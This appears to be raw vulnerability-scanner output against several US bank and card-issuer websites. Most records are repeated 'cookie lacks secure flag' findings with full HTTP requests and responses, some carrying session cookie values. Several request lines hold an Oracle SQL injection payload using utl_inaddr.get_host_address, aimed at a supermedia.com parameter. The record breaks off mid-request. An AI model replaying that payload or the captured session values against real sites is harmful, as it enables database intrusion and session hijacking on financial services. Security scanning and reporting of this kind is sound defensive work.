<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=bingweb&brand=&&locale=en-US& ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/corporations.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/global_splash.html HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT Server: IBM_HTTP_Server Content-Type: text/html Cache-Control: no-store Expires: Thu, 03 Feb 2011 13:45:15 GMT Date: Thu, 03 Feb 2011 13:45:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:15 GMT; path=/; domain=.americanexpress.com Content-Length: 37032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252"> <STYLE type='text/css ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/js/ad_login.js HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Mon, 31 Aug 2009 21:57:24 GMT Server: IBM_HTTP_Server Content-Type: application/x-javascript Expires: Thu, 03 Feb 2011 20:47:26 GMT Date: Thu, 03 Feb 2011 14:16:14 GMT Content-Length: 9515 Connection: close Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:14 GMT; path=/; domain=.americanexpress.com
/** SWF Object 1.5 : Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License: * http://www.opensource.o ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/mt_personal.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/pz/pes_basic.js HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Mon, 29 Nov 2010 12:03:47 GMT Server: IBM_HTTP_Server Content-Type: application/x-javascript Expires: Fri, 04 Feb 2011 06:53:10 GMT Date: Thu, 03 Feb 2011 14:16:16 GMT Content-Length: 18578 Connection: close Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com
/* Personalization Enterprise Service * * Standard Approach : JSON Integration * Created: Renjith Lal * Date: 04/02/2010 *--------------------------------------------------------------------- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/pz/pes_login.js HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Thu, 28 Oct 2010 21:43:44 GMT Server: IBM_HTTP_Server Content-Type: application/x-javascript Expires: Thu, 03 Feb 2011 20:49:12 GMT Date: Thu, 03 Feb 2011 14:16:16 GMT Content-Length: 7866 Connection: close Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com
/* Personalization Enterprise Service * * Code below this comment is related to the Client Integrations for the PES JSON response . *----------------------------------------------------------- ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: itreasury.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Set-Cookie: COOKIE-ITREASURY.REGIONSTEST.COM=R1009885090; path=/ Set-Cookie: ITREASURY2.REGIONS.COM=R3486410295; path=/ Date: Thu, 03 Feb 2011 15:51:13 GMT Server: IBM_HTTP_Server Last-Modified: Fri, 06 Nov 2009 15:20:43 GMT ETag: "18cc7e-ee-632508c0" Accept-Ranges: bytes Content-Length: 238 Cache-Control: private, no-cache, no-store, post-check=0, pre-check=0, no-cache="set-cookie,set-cookie2" Expires: Sat, 6 May 1995 12:00:00 GMT Connection: close Content-Type: text/html
<!--Configuration file needed for webserver to redirect to Login Screen when lazy url is entered--> <html> <head> <title>Login</title> <script language="javascript"> window.location="/wcmfd/wcmpw/Cust ...[SNIP]...
The following cookies were issued by the application and do not have the secure flag set:
v1st=7904FA44F0E8E4E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
LABS_Cookie=2376211466.64288.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rapidalerts/ HTTP/1.1 Host: labs.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: v1st=7904FA44F0E8E4E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com Set-Cookie: JSESSIONID=D972FC3BF23E3E95BEC7A3C1F716FC0A; Path=/rapidalerts; Secure Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 13:45:18 GMT Connection: close Set-Cookie: LABS_Cookie=2376211466.64288.0000; path=/ Content-Length: 6311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/selfservice/main.do HTTP/1.1 Host: online.bbandt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found connection: close content-type: text/html; charset=iso-8859-1 date: Thu, 03 Feb 2011 14:10:48 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-old-content-length: 305 Set-Cookie: PD_STATEFUL_70873996-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/ Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /online/selfservice/main.do was not found on this ser ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/selfservice/main.do?flow= HTTP/1.1 Host: online.bbandt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found connection: close content-type: text/html; charset=iso-8859-1 date: Thu, 03 Feb 2011 14:10:49 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-old-content-length: 305 Set-Cookie: PD_STATEFUL_7092e99e-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/ Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /online/selfservice/main.do was not found on this ser ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /das/channel/enrollDisplay HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:45:25 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=CONS&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=o2JE22B0Api8bfU5lQAAAAAAA5lwAHR50dFYpTld0G3jevD4Cra98VywSRwUGu1UVqtRMSnXRugM1Ic=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:17:54 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=0256DD3E2F98102FBA68EF2D383024B5; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=nhGmx3xwk5gjzZG20xMtQOl6qUU=55 4N.WCv7z1Zp27CNLMkWZrcctgrr.2950501; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The following cookie was issued by the application and does not have the secure flag set:
BIGipServerPublic=1880363180.49556.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/gateway HTTP/1.1 Host: payroll.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=c38625c1a3aedba4074c3d8ad425.Public2; Path=/; Secure Content-Type: text/html; charset=iso-8859-1 Content-Length: 0 Date: Thu, 03 Feb 2011 15:51:13 GMT Connection: close Set-Cookie: BIGipServerPublic=1880363180.49556.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hsbcpb/ HTTP/1.1 Host: pfo.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Thu, 03 Feb 2011 19:14:49 GMT Content-type: text/html; charset=ISO-8859-1 Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296760489.597571; path=/; expires=Sun, 31-Jan-2021 19:14:49 GMT Content-language: en-US Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML>
The following cookie was issued by the application and does not have the secure flag set:
BRANDID=PREMIER
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jsp/oao/relc/cashedge/oao_application_retrieve.jsp?homeid=99992052&BRANDID=PREMIER HTTP/1.1 Host: quickaccount.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<script> function MM_goToURL() { //v3.0 var i, args=MM_goToURL.arguments; document.MM_returnValue = false; for (i=0; i<(args.length-1); i+=2) eval(a ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/13041680/?cmd=file&file=visitorWantsToChat&site=13041680&byhref=1&AEPARAMS&SESSIONVAR!StaticButtonNameNoScript=Generic HTTP/1.1 Host: sales.liveperson.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HumanClickKEY=2662170475251338767; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickSiteContainerID_2489482=STANDALONE;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:47:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-16101423669632-1296740856:0; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net Set-Cookie: HumanClickKEY=4239242515931163064; path=/hc/13041680 Set-Cookie: HumanClickSiteContainerID_13041680=STANDALONE; path=/hc/13041680 Set-Cookie: LivePersonID=-16101423669632-1296740856:-1:-1:-1:-1; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net Set-Cookie: HumanClickCHATKEY=7675585467513136947; path=/hc/13041680; secure Content-Type: text/html Last-Modified: Thu, 03 Feb 2011 13:47:36 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 5641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: sslgypsy-test.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750407186-sslgypsy-test.superpages.com-7577407-636051; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:26:47 GMT; Path=/ Location: http://sslgypsy-test.superpages.com/yp.advanced.jsp? Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 0 Date: Thu, 03 Feb 2011 16:26:47 GMT Connection: close Set-Cookie: NSC_ttmhzqtz-443=ffffffff9482124945525d5f4f58455e445a4a421548;expires=Thu, 03-Feb-2011 16:28:47 GMT;path=/;secure
rfaft2c1_.regions.com_%2F_wlf=TlNDX3VwbGZvdC5zZmhqcG90LmRwbi13anFf?TxQcFo0NsG+CTkoDF7kyEhxxlOEA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: tokens.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jaction/00asup_RetargetingSecure_1 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: redcated Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/html Expires: 0 Vary: Accept-Encoding P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296759635-11855865; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=82A8A851D01949528AD578CC9601958F; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Date: Thu, 03 Feb 2011 19:00:35 GMT Connection: close Content-Length: 485
function AT_tags(){ try{var tags = new Array(); var imgs = new Array(); tags = ['https://a248.e.akamai.net/img.redcated/images/pixel.gif','https://ad.bizo.com/pixel?id=175863&t=2','https ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.pv?blur=false&poll=60000&url=https%3A//www.supermedia.com/spportal/spportalFlow.do%3F_flowExecutionKey%3D%2527%257C%257C%28utl_inaddr.get_host_address%28%28select+chr%2895%29%257C%257Cchr%2833%29%257C%257Cchr%2864%29%257C%257Cchr%2851%29%257C%257Cchr%28100%29%257C%257Cchr%28105%29%257C%257Cchr%28108%29%257C%257Cchr%28101%29%257C%257Cchr%28109%29%257C%257Cchr%28109%29%257C%257Cchr%2897%29+from+DUAL%29%29%29%257C%257C%2527&pvid=1296759669758946057&wdid=798708614246318013&idid=2139287495442682134&cp=https&vr=Processing%20Error%20Title&1296759669434 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: vms.boldchat.com Connection: Keep-Alive Cache-Control: no-cache Cookie: bc-visitor-id=0=0
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" X-Boldcenter-PageViewID: 1296759669758946057 X-Boldcenter-VisitID: 9223372036839666059 Set-Cookie: bc-visitor-id=798708614246318013=3840678644403429768&0=0; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:00:36 GMT Set-Cookie: bc-visit-id=798708614246318013=9223372036839666059; domain=.boldchat.com; path=/ Content-Type: image/gif Connection: close Date: Thu, 03 Feb 2011 19:00:36 GMT Content-Length: 35
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /airlines-credit-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-card-rewards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gift/giftcardslanding.shtml HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:47:48 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296740868411065; path=/; expires=Sun, 07-Feb-16 13:47:48 GMT; domain=.americanexpress.com Accept-Ranges: bytes Cache-Control: max-age=-284016 Expires: Mon, 31 Jan 2011 06:54:12 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 64996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gold-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /no-annual-fee-credit-cards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HICServlet HTTP/1.1 Host: www.banking.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 16:35:29 GMT Content-type: text/html;charset=ISO-8859-1 Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296750929.438276; path=/; expires=Sun, 31-Jan-2021 16:35:29 GMT Surrogate-control: no-store Content-language: en-US Set-cookie: HSBCUSID=00013uF8pzmV9vu4OA6F5HlhYcO:15fcas229; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/citizensinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Thu, 03 Feb 2011 15:39:39 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=WypGP_b5c8mV_jNQmSsiR3IOaXISAk1KzDsKAUw2IAAL6AABqjMGBAAAAQAGBU1KzDsAP03; path=/; domain=.mystreetscape.com; expires=Fri, 03-Feb-2012 15:39:39 GMT Set-cookie: spc=121; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=4F87F0A2406FC4D216FAB75C56426E60; path=/; secure Content-length: 259 Content-type: text/html Fsreqid: REQ4d4acc3b0a014c3620000be80000aa33 Fscalleeid: ibweb121 Fselapsedtime: 10048 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/ Content-Length: 102267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/arrowGray_Small.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/arrowOrange.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/bgDot.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/logoEqualHousingLender.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
